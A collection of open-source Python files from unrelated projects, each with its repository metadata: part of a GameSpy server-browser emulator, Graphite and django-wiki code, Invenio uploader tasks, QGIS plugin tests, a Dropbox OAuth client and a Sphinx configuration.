" fields: %s / options: %08x / max servers: %d /"
" source ip: %08x",
list_version, encoding_version,
game_version, query_game,
game_name, challenge, filter,
fields, options, max_servers,
source_ip)
# Requesting ip and port of client, not server
if not filter and not fields or send_ip:
output = bytearray(
[int(x) for x in self.address.host.split('.')]
)
# Does this ever change?
output += utils.get_bytes_from_short(6500, True)
enc = gs_utils.EncTypeX()
output_enc = enc.encrypt(
self.secret_key_list[game_name],
challenge,
output
)
self.transport.write(bytes(output_enc))
self.log(logging.DEBUG,
"%s",
"Responding with own IP and game port...")
self.log(logging.DEBUG,
"%s",
utils.pretty_print_hex(output))
else:
self.find_server(query_game, filter, fields,
max_servers, game_name, challenge)
elif packet[2] == '\x02': # Send message request
packet_len = utils.get_short(packet, 0, True)
dest_addr = '.'.join(["%d" % ord(x) for x in packet[3:7]])
# What's the pythonic way to do this? unpack?
dest_port = utils.get_short(packet, 7, True)
dest = (dest_addr, dest_port)
self.log(logging.DEBUG,
"Received send message request from %s:%s to"
" %s:%d... expecting %d byte packet.",
self.address.host, self.address.port,
dest_addr, dest_port, packet_len)
self.log(logging.DEBUG,
"%s",
utils.pretty_print_hex(bytearray(packet)))
if packet_len == len(packet):
# Contains entire packet, send immediately.
self.forward_data_to_client(packet[9:], dest)
else:
self.log(logging.ERROR,
"%s",
"ERROR: Could not find entire packet.")
elif packet[2] == '\x03': # Keep alive reply
self.log(logging.DEBUG,
"Received keep alive from %s:%s...",
self.address.host, self.address.port)
else:
self.log(logging.DEBUG,
"Received unknown command (%02x) from %s:%s...",
ord(packet[2]),
self.address.host, self.address.port)
self.log(logging.DEBUG,
"%s",
utils.pretty_print_hex(bytearray(packet)))
except:
self.log(logging.ERROR,
"Unknown exception: %s",
traceback.format_exc())
def get_game_id(self, data):
game_id = data[5: -1]
return game_id
def get_server_list(self, game, filter, fields, max_count):
results = self.server_manager.find_servers(game, filter, fields,
max_count)
return results
def generate_server_list_header_data(self, address, fields):
output = bytearray()
# Write the address
output += bytearray([int(x) for x in address.host.split('.')])
# Write the port
output += utils.get_bytes_from_short(address.port, True)
# Write number of fields that will be returned.
key_count = len(fields)
output += utils.get_bytes_from_short(key_count)
if key_count != len(fields):
# For some reason we didn't get all of the expected data.
self.log(logging.WARNING,
"key_count[%d] != len(fields)[%d]",
key_count, len(fields))
self.log(logging.WARNING, "%s", fields)
# Write the fields
for field in fields:
output += bytearray(field) + '\0\0'
return output
def generate_server_list_data(self, address, fields, server_info,
finalize=False):
output = bytearray()
flags_buffer = bytearray()
if len(server_info) > 0:
# Start server loop here instead of including all of the fields
# and stuff again
flags = 0
if len(server_info) != 0:
# This condition is always true? Isn't it?
flags |= ServerListFlags.HAS_KEYS_FLAG
if "natneg" in server_info:
flags |= ServerListFlags.CONNECT_NEGOTIATE_FLAG
ip = utils.get_bytes_from_int_signed(
int(server_info['publicip']), self.console
)
flags_buffer += ip
flags |= ServerListFlags.NONSTANDARD_PORT_FLAG
if server_info['publicport'] != "0":
flags_buffer += utils.get_bytes_from_short(
int(server_info['publicport']), True
)
else:
flags_buffer += utils.get_bytes_from_short(
int(server_info['localport']), True
)
if "localip0" in server_info:
# How to handle multiple localips?
flags |= ServerListFlags.PRIVATE_IP_FLAG
flags_buffer += bytearray(
[int(x) for x in server_info['localip0'].split('.')]
) # IP
if "localport" in server_info:
flags |= ServerListFlags.NONSTANDARD_PRIVATE_PORT_FLAG
flags_buffer += utils.get_bytes_from_short(
int(server_info['localport']), True
)
flags |= ServerListFlags.ICMP_IP_FLAG
flags_buffer += bytearray(
[int(x) for x in "0.0.0.0".split('.')]
)
output += bytearray([flags & 0xff])
output += flags_buffer
if (flags & ServerListFlags.HAS_KEYS_FLAG):
# Write data for associated fields
if 'requested' in server_info:
for field in fields:
output += '\xff' + \
bytearray(
server_info['requested'][field]
) + '\0'
return output
def find_server(self, query_game, filter, fields, max_servers, game_name,
challenge):
def send_encrypted_data(self, challenge, data):
self.log(logging.DEBUG,
"Sent server list message to %s:%s...",
self.address.host, self.address.port)
self.log(logging.DEBUG, "%s", utils.pretty_print_hex(data))
# Encrypt data
enc = gs_utils.EncTypeX()
data = enc.encrypt(self.secret_key_list[game_name],
challenge, data)
# Send to client
self.transport.write(bytes(data))
# OpenSpy's max packet length, just go with it for now
max_packet_length = 256 + 511 + 255
# Get dictionary from master server list server.
self.log(logging.DEBUG,
"Searching for server matching '%s' with the fields '%s'",
filter, fields)
self.server_list = self.server_manager.find_servers(
query_game, filter, fields, max_servers
)._getvalue()
self.log(logging.DEBUG, "%s", "Found server(s):")
self.log(logging.DEBUG, "%s", self.server_list)
if not self.server_list:
self.server_list = [{}]
data = self.generate_server_list_header_data(self.address, fields)
for i in range(0, len(self.server_list)):
server = self.server_list[i]
if server and fields and 'requested' in server and \
not server['requested']:
# If the requested fields weren't found then don't return
# a server. This fixes a bug with Mario Kart DS.
# print "Requested was empty"
server = {}
if "__console__" in server:
self.console = int(server['__console__'])
# Generate binary server list data
data += self.generate_server_list_data(
self.address, fields, server, i >= len(self.server_list)
)
if len(data) >= max_packet_length:
send_encrypted_data(self, challenge, data)
data = bytearray()
# if "publicip" in server and "publicport" in server:
# self.server_cache[str(server['publicip']) + \
# str(server['publicport'])] = server
data += '\0'
data += utils.get_bytes_from_int(0xffffffff)
send_encrypted_data(self, challenge, data)
def find_server_in_cache(self, addr, port, console):
ip = str(utils.get_ip(
bytearray([int(x) for x in addr.split('.')]),
0,
console
))
server = self.server_manager.find_server_by_address(ip,
port)._getvalue()
self.log(logging.DEBUG,
"find_server_in_cache is returning: %s %s",
server, ip)
return server, ip
def forward_data_to_client(self, data, forward_client):
# Find session id of server
# Iterate through the list of servers sent to the client and match by
# IP and port. Is there a better way to determine this information?
if forward_client is None or len(forward_client) != 2:
return
server, ip = self.find_server_in_cache(forward_client[0],
forward_client[1], self.console)
if server is None:
if self.console == 0:
server, ip = self.find_server_in_cache(forward_client[0],
forward_client[1],
1) # Try Wii
elif self.console == 1:
server, ip = self.find_server_in_cache(forward_client[0],
forward_client[1],
0) # Try DS
self.log(logging.DEBUG,
"find_server_in_cache returned: %s",
server)
self.log(logging.DEBUG,
"Trying to send message to %s:%d...",
forward_client[0], forward_client[1])
self.log(logging.DEBUG, "%s", utils.pretty_print_hex(bytearray(data)))
if server is None:
return
self.log(logging.DEBUG, "%s %s", ip, server['publicip'])
if server['publicip'] == ip and \
server['publicport'] == str(forward_client[1]):
if forward_client[1] == 0 and 'localport' in server:
# No public port returned from client, try contacting on
# the local port.
forward_client = (forward_client[0], int(server['localport']))
# Send command to server to get it to connect to natneg
# Quick and lazy way to get a random 32bit integer. Replace with
# something else later
cookie = int(utils.generate_random_hex_str(8), 16)
# if (len(data) == 24 and bytearray(data)[0:10] == \
# bytearray([0x53, 0x42, 0x43, 0x4d, 0x03,
# 0x00, 0x00, 0x00, 0x01, 0x04])) or \
# (len(data) == 40 and bytearray(data)[0:10] == \
# bytearray([0x53, 0x42, 0x43, 0x4d,
# 0x0b, 0x00, 0x00, 0x00,
# 0x01, 0x04])):
if self.own_server is None and len(data) >= 16 and \
bytearray(data)[0:4] in (bytearray([0xbb, 0x49, 0xcc, 0x4d]),
bytearray([0x53, 0x42, 0x43, 0x4d])):
# Is the endianness the same between the DS and Wii here?
# It seems so but I'm not positive.
# Note to self: Port is little endian here.
self_port = utils.get_short(bytearray(data[10:12]), 0, False)
self_ip = '.'.join(["%d" % x for x in bytearray(data[12:16])])
self.own_server, _ = self.find_server_in_cache(self_ip,
self_port,
self.console)
if self.own_server is None:
if self.console == 0:
# Try Wii
self.own_server, _ = self.find_server_in_cache(
self_ip, self_port, 1
)
elif self.console == 1:
# Try DS
self.own_server, _ = self.find_server_in_cache(
self_ip, self_port, 0
)
if self.own_server is None:
self.log(logging.DEBUG,
"Could not find own server: %s:%d",
self_ip, self_port)
else:
self.log(logging.DEBUG,
"Found own server: %s",
self.own_server)
elif len(data) == 10 and \
bytearray(data)[0:6] == \
bytearray([0xfd, 0xfc, 0x1e, 0x66, 0x6a, 0xb2]):
natneg_session = utils.get_int_signed(data, 6)
self.log(logging.DEBUG,
"Adding %d to natneg server list: %s",
natneg_session, server)
# Store info in backend so we can get it later in natneg
self.server_manager.add_natneg_server(natneg_session, server)
if self.own_server is not None:
self.log(logging.DEBUG,
"Adding %d to natneg server list: %s (self)",
natneg_session, self.own_server)
# Store info in backend so we can get it later in natneg
self.server_manager.add_natneg_server(natneg_session,
self.own_server)
# if self.qr is not None:
# own_server = self.qr.get_own_server()
#
# self.log(logging.DEBUG,
# "Adding %d to natneg server list: %s",
# natneg_session, own_server)
# self.server_manager.add_natneg_server(natneg_session,
# own_server)
output = bytearray([0xfe, 0xfd, 0x06])
output += utils.get_bytes_from_int(server['__session__'])
output += bytearray(utils.get_bytes_from_int(cookie))
output += bytearray(data)
if self.qr is not None:
self.log(logging.DEBUG,
"Forwarded data to %s:%s through QR server...",
forward_client[0], forward_client[1])
self.qr.socket.sendto(output, forward_client)
else:
# In case we can't contact the QR server, just try sending
# the packet directly. This isn't standard behavior but it
# can work in some instances.
self.log(logging.DEBUG,
"Forwarded data to %s:%s directly"
" (potential error occurred)...",
forward_client[0], forward_client[1])
client_s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_s.sendto(output, forward_client)
if __name__ == "__main__":
server_browser = GameSpyServerBrowserServer()
server_browser.start()
|
sepalani/dwc_network_server_emulator
|
gamespy_server_browser_server.py
|
Python
|
agpl-3.0
| 25,121
|
"""Copyright 2008 Orbitz WorldWide
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
# Django settings for graphite project.
# DO NOT MODIFY THIS FILE DIRECTLY - use local_settings.py instead
from os.path import dirname, join, abspath
TEMPLATE_DIRS = (
join(dirname( abspath(__file__) ), 'templates'),
)
#Django settings below, do not touch!
APPEND_SLASH = False
TEMPLATE_DEBUG = False
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
}
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = 'en-us'
# Absolute path to the directory that holds media.
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT.
# Example: "http://media.lawrence.com"
MEDIA_URL = ''
MIDDLEWARE_CLASSES = (
'graphite.middleware.LogExceptionsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.gzip.GZipMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'graphite.urls'
INSTALLED_APPS = (
'graphite.metrics',
'graphite.render',
'graphite.browser',
'graphite.composer',
'graphite.account',
'graphite.dashboard',
'graphite.whitelist',
'graphite.events',
'graphite.url_shortener',
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.admin',
'django.contrib.contenttypes',
'django.contrib.staticfiles',
'tagging',
)
AUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.ModelBackend']
GRAPHITE_WEB_APP_SETTINGS_LOADED = True
|
bruce-lyft/graphite-web
|
webapp/graphite/app_settings.py
|
Python
|
apache-2.0
| 2,240
|
from __future__ import unicode_literals
from __future__ import absolute_import
from django.views.generic.base import TemplateResponseMixin
from wiki.core.plugins import registry
from wiki.conf import settings
class ArticleMixin(TemplateResponseMixin):
"""A mixin that receives an article object as a parameter (usually from a wiki
decorator) and puts this information as an instance attribute and in the
template context."""
def dispatch(self, request, article, *args, **kwargs):
self.urlpath = kwargs.pop('urlpath', None)
self.article = article
self.children_slice = []
if settings.SHOW_MAX_CHILDREN > 0:
try:
for child in self.article.get_children(
max_num=settings.SHOW_MAX_CHILDREN +
1,
articles__article__current_revision__deleted=False,
user_can_read=request.user):
self.children_slice.append(child)
except AttributeError as e:
raise Exception(
"Attribute error most likely caused by wrong MPTT version. Use 0.5.3+.\n\n" +
str(e))
return super(ArticleMixin, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
kwargs['urlpath'] = self.urlpath
kwargs['article'] = self.article
kwargs['article_tabs'] = registry.get_article_tabs()
kwargs['children_slice'] = self.children_slice[:20]
kwargs['children_slice_more'] = len(self.children_slice) > 20
kwargs['plugins'] = registry.get_plugins()
return kwargs
|
Infernion/django-wiki
|
wiki/views/mixins.py
|
Python
|
gpl-3.0
| 1,668
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2014 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Uploader celery tasks."""
from workflow.engine import GenericWorkflowEngine as WorkflowEngine
from invenio.base.globals import cfg
from invenio.celery import celery
from invenio.modules.jsonalchemy.reader import Reader
from invenio.modules.records.api import Record
from invenio.modules.workflows.registry import workflows
from . import signals
from .errors import UploaderException
@celery.task
def translate(blob, master_format, kwargs=None):
"""Translate from the `master_format` to `JSON`.
:param blob: String contain the input file.
:param master_format: Format of the blob, it will used to decide which
reader to use.
:param kwargs: Arguments to be used by the reader.
See :class:`invenio.modules.jsonalchemy.reader.Reader`
:returns: The blob and the `JSON` representation of the input file created
by the reader.
"""
return (blob,
Reader.translate(blob, Record, master_format,
**(kwargs or dict())).dumps())
@celery.task
def run_workflow(records, name, **kwargs):
"""Run the uploader workflow itself.
:param records: List of tuples `(blob, json_record)` from :func:`translate`
:param name: Name of the workflow to be run.
:parma kwargs: Additional arguments to be used by the tasks of the workflow
:returns: Typically the list of record Ids that has been process, although
this value could be modify by the `post_tasks`.
"""
def _run_pre_post_tasks(tasks):
"""Helper function to run list of functions."""
for task in tasks:
task(records, **kwargs)
#FIXME: don't know why this is needed but IT IS!
records = records[0]
if name in cfg['UPLOADER_WORKFLOWS']:
workflow = workflows.get(name)
else:
raise UploaderException("Workflow {0} not in UPLOADER_WORKFLOWS".format(name))
_run_pre_post_tasks(workflow.pre_tasks)
wfe = WorkflowEngine()
wfe.setWorkflow(workflow.tasks)
wfe.setVar('options', kwargs)
wfe.process(records)
_run_pre_post_tasks(workflow.post_tasks)
signals.uploader_finished.send(uploader_workflow=name,
result=records, **kwargs)
return records
# @celery.task
# def error_handler(uuid):
# """@todo: Docstring for _error_handler.
#
# :uuid: @todo
# :returns: @todo
#
# """
# result = celery.AsyncResult(uuid)
# exc = result.get(propagate=False)
# print('Task %r raised exception: %r\n%r'
# % (uuid, exc, result.traceback))
# return None
__all__ = ('translate', 'run_workflow')
|
Lilykos/invenio
|
invenio/modules/uploader/tasks.py
|
Python
|
gpl-2.0
| 3,385
|
import unittest
import os, sys, imp
from qgis import utils
from qgis.core import QgsVectorLayer, QgsField, QgsProject, QGis
from qgis.PyQt.QtCore import QVariant
from .qgis_models import set_up_interface
from mole3.qgisinteraction import layer_interaction as li
from mole3.qgisinteraction import plugin_interaction as pi
from mole3.tests.qgis_models import HybridLayer
class PstPluginInteractionTest(unittest.TestCase):
def create_layer_with_features(self, name, type='Polygon'):
v_layer_name = li.biuniquify_layer_name(name)
if type == 'Point':
v_layer = QgsVectorLayer('{}?crs=EPSG:3857'.format(type), v_layer_name, 'memory', False)
else:
v_layer = HybridLayer(type, v_layer_name)
provider = v_layer.dataProvider()
v_layer.startEditing()
attributes = [QgsField('COLOR_RED', QVariant.String),
QgsField('COLOR_GRE', QVariant.String),
QgsField('COLOR_BLU', QVariant.String),
QgsField('COLOR_ALP', QVariant.String)]
provider.addAttributes(attributes)
v_layer.commitChanges()
return v_layer
def add_pointsamplingtool_to_plugins(self):
plugin_folder = os.path.join(utils.plugin_paths[0], 'pointsamplingtool', '__init__.py')
self.assertTrue(os.path.exists(str(plugin_folder)), 'Path to plugin not found. ({})'.format(str(plugin_folder)))
sys.modules['pointsamplingtool'] = imp.load_source('pointsamplingtool', plugin_folder)
def setUp(self):
self.qgis_app, self.canvas, self.iface = set_up_interface()
utils.plugin_paths = [os.path.expanduser('~/.qgis2/python/plugins')]
utils.updateAvailablePlugins()
utils.loadPlugin('pointsamplingtool')
utils.iface = self.iface
utils.startPlugin('pointsamplingtool')
def tearDown(self):
if self.qgis_app is not None:
del(self.qgis_app)
def test_if_plugin_is_available(self):
self.assertNotEqual(utils.available_plugins, [], 'No plugins were loaded.')
self.assertIn('pointsamplingtool', utils.available_plugins)
def test_if_plugin_is_accessible(self):
self.add_pointsamplingtool_to_plugins()
psti = pi.PstInteraction(utils.iface)
self.assertIsNotNone(psti)
def test_if_all_fields_are_selected(self):
self.add_pointsamplingtool_to_plugins()
registry = QgsProject.instance()
point_layer = self.create_layer_with_features('point', 'Point')
poly_layer1 = self.create_layer_with_features('poly1')
poly_layer2 = self.create_layer_with_features('poly2')
registry.addMapLayer(point_layer)
registry.addMapLayer(poly_layer1)
registry.addMapLayer(poly_layer2)
psti = pi.PstInteraction(utils.iface)
psti.set_input_layer(point_layer.name())
selected_fields = psti.pst_dialog.fieldsTable
psti.select_and_rename_files_for_sampling()
fields_point = point_layer.dataProvider().fields()
fields_poly1 = poly_layer1.dataProvider().fields()
fields_poly2 = poly_layer2.dataProvider().fields()
rows_expected = fields_point.count() + fields_poly1.count() + fields_poly2.count()
self.assertEqual(selected_fields.rowCount(), rows_expected)
def test_if_field_names_are_unique(self):
self.add_pointsamplingtool_to_plugins()
registry = QgsProject.instance()
point_layer = self.create_layer_with_features('test_pointlayer', 'Point')
poly_layer1 = self.create_layer_with_features('test_polygonlayer1')
poly_layer2 = self.create_layer_with_features('test_polygonlayer2')
registry.addMapLayer(point_layer)
registry.addMapLayer(poly_layer1)
registry.addMapLayer(poly_layer2)
psti = pi.PstInteraction(utils.iface)
psti.set_input_layer(point_layer.name())
map = psti.select_and_rename_files_for_sampling()
appendix = ['R', 'G', 'B', 'a']
poly_fields = psti.pst_dialog.rastItems[poly_layer1.name()]
for i in range(1, len(poly_fields)):
self.assertEqual(poly_fields[i][1], '01{}_{}'.format(poly_layer1.name()[:6], appendix[i-1]))
poly_fields = psti.pst_dialog.rastItems[poly_layer2.name()]
for i in range(1, len(poly_fields)):
self.assertEqual(poly_fields[i][1], '02{}_{}'.format(poly_layer1.name()[:6], appendix[i-1]))
self.assertEqual(map[poly_layer1.name()], '01{}'.format(poly_layer1.name()[:6]))
self.assertEqual(map[poly_layer2.name()], '02{}'.format(poly_layer2.name()[:6]))
if __name__ == '__main__':
unittest.main()
|
UdK-VPT/Open_eQuarter
|
mole3/tests/plugin_interaction_test.py
|
Python
|
gpl-2.0
| 4,712
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# This file is part of utext
#
# Copyright (C) 2012-2016 Lorenzo Carbonell
# lorenzo.carbonell.cerezo@gmail.com
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import requests
import json
import os
from urllib.parse import urlencode
import random
import time
from .logindialog import LoginDialog
from . import comun
KEY = 'rlajhlfbdjlv7vq'
SECRET = '4hxohya6cyhvsdz'
class DropboxService(object):
def __init__(self, token_file):
self.session = requests.session()
self.request_token_url = \
'https://api.dropbox.com/1/oauth/request_token'
self.authorize_url = 'https://www.dropbox.com/1/oauth/authorize'
self.access_token_url = 'https://api.dropbox.com/1/oauth/access_token'
self.key = KEY
self.secret = SECRET
self.token_file = token_file
self.access_token = None
self.refresh_token = None
if os.path.exists(token_file):
f = open(token_file, 'r')
text = f.read()
f.close()
try:
data = json.loads(text)
self.oauth_token = data['oauth_token']
self.oauth_token_secret = data['oauth_token_secret']
except Exception as e:
print('Error')
print(e)
def get_request_token(self):
params = {}
params['oauth_consumer_key'] = KEY
params['oauth_timestamp'] = int(time.time())
params['oauth_nonce'] = ''.join(
[str(random.randint(0, 9)) for i in range(8)])
params['oauth_version'] = '1.0'
params['oauth_signature_method'] = 'PLAINTEXT'
params['oauth_signature'] = '%s&' % SECRET
response = self.session.request(
'POST', self.request_token_url, params=params)
if response.status_code == 200:
oauth_token_secret, oauth_token = response.text.split('&')
oauth_token_secret = oauth_token_secret.split('=')[1]
self.ts = oauth_token_secret
oauth_token = oauth_token.split('=')[1]
return oauth_token, oauth_token_secret
return None
def get_authorize_url(self, oauth_token, oauth_token_secret):
params = {}
params['oauth_token'] = oauth_token
params['oauth_callback'] = 'http://localhost'
return 'https://www.dropbox.com/1/oauth/authorize?%s' %\
(urlencode(params))
def get_access_token(self, oauth_token, secret):
params = {}
params['oauth_consumer_key'] = KEY
params['oauth_token'] = oauth_token
params['oauth_timestamp'] = int(time.time())
params['oauth_nonce'] = ''.join(
[str(random.randint(0, 9)) for i in range(8)])
params['oauth_version'] = '1.0'
params['oauth_signature_method'] = 'PLAINTEXT'
params['oauth_signature'] = '%s&%s' % (SECRET, secret)
response = self.session.request(
'POST', self.access_token_url, params=params)
print(response, response.status_code, response.text)
if response.status_code == 200:
oauth_token_secret, oauth_token, uid = response.text.split('&')
oauth_token_secret = oauth_token_secret.split('=')[1]
oauth_token = oauth_token.split('=')[1]
uid = uid.split('=')[1]
self.oauth_token = oauth_token
self.oauth_token_secret = oauth_token_secret
f = open(self.token_file, 'w')
f.write(json.dumps(
{'oauth_token': oauth_token,
'oauth_token_secret': oauth_token_secret}))
f.close()
return uid, oauth_token, oauth_token_secret
return None
def get_account_info(self):
ans = self.__do_request(
'GET', 'https://api.dropbox.com/1/account/info')
if ans.status_code == 200:
return ans.text
return None
def get_files(self):
url = 'https://api.dropbox.com/1/search/auto/'
ans = self.__do_request('GET', url, addparams={"query": "."})
if ans and ans.status_code == 200:
return json.loads(ans.text)
return None
def get_file(self, afile):
url = 'https://api-content.dropbox.com/1/files/auto/%s' % (afile)
ans = self.__do_request('GET', url)
if ans and ans.status_code == 200:
return ans.text
return None
def put_file(self, filename, content):
url = 'https://api-content.dropbox.com/1/files_put/auto/%s' % (
filename)
addparams = {}
addparams['overwrite'] = True
addheaders = {
'Content-type': 'multipart/related;boundary="END_OF_PART"',
'Content-length': str(len(content)),
'MIME-version': '1.0'}
ans = self.__do_request('POST', url, addheaders=addheaders,
addparams=addparams, data=content)
if ans is not None:
return ans.text
def __do_request(self, method, url, addheaders=None, data=None,
addparams=None, first=True, files=None):
params = {}
params['oauth_consumer_key'] = KEY
params['oauth_token'] = self.oauth_token
params['oauth_timestamp'] = int(time.time())
params['oauth_nonce'] = ''.join(
[str(random.randint(0, 9)) for i in range(8)])
params['oauth_version'] = '1.0'
params['oauth_signature_method'] = 'PLAINTEXT'
params['oauth_signature'] = '%s&%s' % (
SECRET, self.oauth_token_secret)
headers = None
if headers is not None:
headers.update(addheaders)
else:
headers = addheaders
if addparams is not None:
params.update(addparams)
if data:
response = self.session.request(method, url, data=data,
headers=headers,
params=params, files=files)
else:
response = self.session.request(method, url, headers=headers,
params=params, files=files)
print(response, response.status_code)
if response.status_code == 200 or response.status_code == 201:
return response
elif (response.status_code == 401 or response.status_code == 403) \
and first:
pass
return None
if __name__ == '__main__':
ds = DropboxService(comun.TOKEN_FILE)
if os.path.exists(comun.TOKEN_FILE):
print(ds.get_account_info())
print(ds.put_file(
'remarkable2.md',
'esto es un ejemplo del funcionamiento'))
ans = ds.get_file('remarkable2.md')
print('============')
print(ans)
else:
oauth_token, oauth_token_secret = ds.get_request_token()
authorize_url = ds.get_authorize_url(oauth_token, oauth_token_secret)
ld = LoginDialog(1024, 600, authorize_url)
ld.run()
oauth_token = ld.code
uid = ld.uid
ld.destroy()
if oauth_token is not None:
print(oauth_token, uid)
ans = ds.get_access_token(oauth_token, oauth_token_secret)
print(ans)
print(ds.get_account_info())
'''
print(ds.get_account_info())
print(ds.get_file('data'))
print(ds.put_file('/home/atareao/Escritorio/data'))
'''
exit(0)
|
atareao/utext
|
src/utext/services.py
|
Python
|
gpl-3.0
| 8,053
|
# -*- coding: utf-8 -*-
#
# PyWavelets documentation build configuration file, created by
# sphinx-quickstart on Sun Mar 14 10:46:18 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import re
import datetime
import jinja2.filters
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.doctest', 'sphinx.ext.autodoc', 'sphinx.ext.todo',
'sphinx.ext.extlinks', 'numpydoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'PyWavelets'
copyright = jinja2.filters.do_mark_safe('2006-%s, <a href="https://groups.google.com/forum/#!forum/pywavelets">The PyWavelets Developers</a>' % datetime.date.today().year)
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
import pywt
version = re.sub(r'\.dev0+.*$', r'.dev', pywt.__version__)
release = pywt.__version__
print "PyWavelets (VERSION %s)" % (version,)
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
unused_docs = ['substitutions', ]
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = ['pywt.']
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'nature'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = 'PyWavelets Documentation'
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
html_sidebars = {
'**': ['localtoc.html', "relations.html", 'quicklinks.html', 'searchbox.html', 'editdocument.html'],
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
html_use_opensearch = 'http://pywavelets.readthedocs.org'
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'PyWaveletsdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'PyWavelets.tex', 'PyWavelets Documentation',
'The PyWavelets Developers', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
